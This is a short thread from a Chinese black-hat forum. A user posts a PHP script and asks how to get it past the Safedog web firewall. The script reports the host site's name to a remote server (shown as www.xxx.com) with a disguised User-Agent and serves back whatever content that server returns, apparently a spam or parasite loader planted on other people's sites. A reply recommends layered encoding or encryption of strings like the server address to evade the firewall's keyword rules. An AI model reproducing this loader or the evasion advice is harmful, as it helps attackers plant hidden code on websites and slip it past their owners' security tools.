黑帽联盟

标题: jsc怎么过安全狗拦截 [打印本页]

作者: hjyy120    时间: 2017-3-23 09:01
标题: jsc怎么过安全狗拦截
jsc怎么过安全狗拦截
QQ截图20170323085727.jpg
<?php
set_time_limit(0);
header("Content-Type: text/html;charset=utf-8");
$Remote_server = "http://www.xxx.com/";
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
$Content_mb=getHTTPPage($Remote_server."/index.php?host=".$host_name);
function getHTTPPage($url) {
$opts = array(
   'http'=>array(
  'method'=>"GET",
  'header'=>"User-Agent: aQ0O010O"
   )
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context);
if (empty($html)) {
  exit("<p align='center'><font color='red'><b>Connection Error!</b></font></p>");
}
return $html;
}
echo $Content_mb;
?>

作者: 定位    时间: 2017-3-25 01:32
安全狗规则上面有的也是死的,有的只是针对敏感字符拦截,比如上面的remote_server,可以进行转码操作,不过不一定能成功,还不行的话,可以进行多层转码。还有一种就是直接加密去操作
作者: pangkee    时间: 2017-3-28 01:12
是不是把服务对象换成狗食,他就让你过去了哈





欢迎光临 黑帽联盟 (https://bbs.cnblackhat.com/) Powered by Discuz! X2.5